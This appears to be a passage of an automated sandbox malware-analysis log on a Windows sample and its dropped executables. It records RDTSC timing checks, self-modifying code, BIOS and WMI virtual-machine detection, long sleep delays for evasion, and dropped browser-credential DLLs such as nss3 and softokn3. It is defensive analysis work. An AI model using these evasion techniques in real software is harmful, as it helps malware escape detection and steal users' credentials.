                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0C67 second address: 4FE0C6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0C6D second address: 4FE0C9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C150211Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F05C1502120h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F05C150211Eh 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0C9F second address: 4FE0CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0CA5 second address: 4FE0CE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F05C1502129h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov eax, 75F87F13h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F05C1502126h 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0CE7 second address: 4FE0CF5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0CF5 second address: 4FE0CFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050E6A second address: 5050E8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050E8E second address: 5050E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050E92 second address: 5050EAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050EAC second address: 5050EF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F05C1502121h 0x00000009 sbb eax, 1A5B1086h 0x0000000f jmp 00007F05C1502121h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F05C150211Ah 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov eax, ebx 0x00000027 mov edi, 66A1776Ch 0x0000002c popad 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050EF6 second address: 5050F33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F05C12920C0h 0x00000009 xor eax, 54684D88h 0x0000000f jmp 00007F05C12920BBh 0x00000014 popfd 0x00000015 mov di, si 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F05C12920BCh 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050F33 second address: 5050F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050F37 second address: 5050F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505015F second address: 5050177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05C1502124h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050177 second address: 50501D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a call 00007F05C12920BAh 0x0000000f mov eax, 632A7061h 0x00000014 pop esi 0x00000015 pushfd 0x00000016 jmp 00007F05C12920C7h 0x0000001b xor eax, 29D38E0Eh 0x00000021 jmp 00007F05C12920C9h 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esp], ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50501D3 second address: 50501D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50501D7 second address: 50501EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF022F second address: 4FF0299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C1502129h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F05C150211Eh 0x0000000f push eax 0x00000010 jmp 00007F05C150211Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F05C1502126h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F05C1502127h 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0299 second address: 4FF029F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF029F second address: 4FF02C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05C1502129h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF02C5 second address: 4FF02CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050573 second address: 5050577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050577 second address: 505057B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505057B second address: 5050581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050581 second address: 50505AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F05C12920C7h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50505AD second address: 5050610 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C1502129h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov di, cx 0x0000000f popad 0x00000010 push dword ptr [ebp+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov edx, 0953E3F2h 0x0000001b pushfd 0x0000001c jmp 00007F05C1502123h 0x00000021 sbb ax, 81EEh 0x00000026 jmp 00007F05C1502129h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050610 second address: 505064F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 1E382502h 0x00000008 movsx edx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [ebp+08h] 0x00000011 jmp 00007F05C12920C2h 0x00000016 push 80143187h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F05C12920C3h 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505064F second address: 5050653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E9EA55 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1045F69 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E9C38A instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1054F34 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10CD5C7 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 94EA55 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: AF5F69 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 94C38A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: B04F34 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: B7D5C7 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSpecial instruction interceptor: First address: A048D7 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSpecial instruction interceptor: First address: C3DE60 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: F9BD1B instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: 1177B36 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: 115BFCB instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: 11DB47A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSpecial instruction interceptor: First address: 10F29A4 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSpecial instruction interceptor: First address: 11585A0 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSpecial instruction interceptor: First address: 7CDF02 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSpecial instruction interceptor: First address: 7CDFD0 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSpecial instruction interceptor: First address: 97CA0A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSpecial instruction interceptor: First address: 7CB362 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSpecial instruction interceptor: First address: 9A4681 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSpecial instruction interceptor: First address: 984794 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSpecial instruction interceptor: First address: A0FD9A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: 69ADF02 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: 69ADFD0 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: 6B5CA0A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: 69AB362 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: 6B84681 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: 6B64794 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: 6BEFD9A instructions caused by: Self-modifying code
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeSpecial instruction interceptor: First address: F4EA55 instructions caused by: Self-modifying code
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeSpecial instruction interceptor: First address: 10F5F69 instructions caused by: Self-modifying code
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeSpecial instruction interceptor: First address: F4C38A instructions caused by: Self-modifying code
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeSpecial instruction interceptor: First address: 1104F34 instructions caused by: Self-modifying code
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeSpecial instruction interceptor: First address: 117D5C7 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: 66EDF02 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: 66EDFD0 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: 689CA0A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: 66EB362 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: 68C4681 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: 68A4794 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSpecial instruction interceptor: First address: 692FD9A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeMemory allocated: 5000000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeMemory allocated: 5220000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeMemory allocated: 5070000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeMemory allocated: 4D60000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeMemory allocated: 50C0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeMemory allocated: 5000000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05050536 rdtsc 0_2_05050536
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1454Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1019Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1587Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1166Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeWindow / User API: threadDelayed 1233Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeWindow / User API: threadDelayed 1251Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeWindow / User API: threadDelayed 1254Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeWindow / User API: threadDelayed 963Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeWindow / User API: threadDelayed 1167Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeWindow / User API: threadDelayed 969Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeWindow / User API: threadDelayed 1256Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3492Thread sleep count: 50 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3492Thread sleep time: -100050s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3852Thread sleep count: 1454 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3852Thread sleep time: -2909454s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6128Thread sleep count: 1019 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6128Thread sleep time: -2039019s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3584Thread sleep count: 250 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3584Thread sleep time: -7500000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2520Thread sleep count: 1587 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2520Thread sleep time: -3175587s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5408Thread sleep time: -360000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1068Thread sleep count: 1166 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1068Thread sleep time: -2333166s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2520Thread sleep time: -38019s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe TID: 7228Thread sleep count: 1233 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe TID: 7228Thread sleep time: -2467233s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe TID: 7708Thread sleep count: 1251 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe TID: 7708Thread sleep time: -2503251s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe TID: 7516Thread sleep time: -32000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe TID: 7524Thread sleep count: 1254 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe TID: 7524Thread sleep time: -2509254s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe TID: 7824Thread sleep count: 963 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe TID: 7824Thread sleep time: -1926963s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe TID: 7696Thread sleep count: 1167 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe TID: 7696Thread sleep time: -2335167s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe TID: 7520Thread sleep count: 969 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe TID: 7520Thread sleep time: -1938969s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe TID: 1732Thread sleep count: 1256 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe TID: 1732Thread sleep time: -2513256s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe TID: 7704Thread sleep time: -150000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe TID: 7932Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe TID: 5800Thread sleep time: -38019s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe TID: 5808Thread sleep time: -46023s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe TID: 4944Thread sleep time: -32000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe TID: 7816Thread sleep time: -38019s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe TID: 5796Thread sleep time: -50025s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe TID: 3084Thread sleep time: -40020s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe TID: 7436Thread sleep time: -58029s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe TID: 8088Thread sleep time: -270000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe TID: 5216Thread sleep time: -40020s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe TID: 2212Thread sleep time: -48024s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe TID: 5904Thread sleep time: -30015s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe TID: 7832Thread sleep time: -38019s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe TID: 8084Thread sleep count: 245 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe TID: 8084Thread sleep time: -1470000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe TID: 5068Thread sleep time: -42021s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe TID: 8152Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe TID: 2316Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe TID: 4044Thread sleep time: -38019s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe TID: 6756Thread sleep time: -32000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe TID: 7224Thread sleep time: -30015s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe TID: 7056Thread sleep time: -210000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe TID: 7212Thread sleep time: -48024s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe TID: 1184Thread sleep time: -42021s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe TID: 7648Thread sleep count: 63 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe TID: 7648Thread sleep time: -378000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
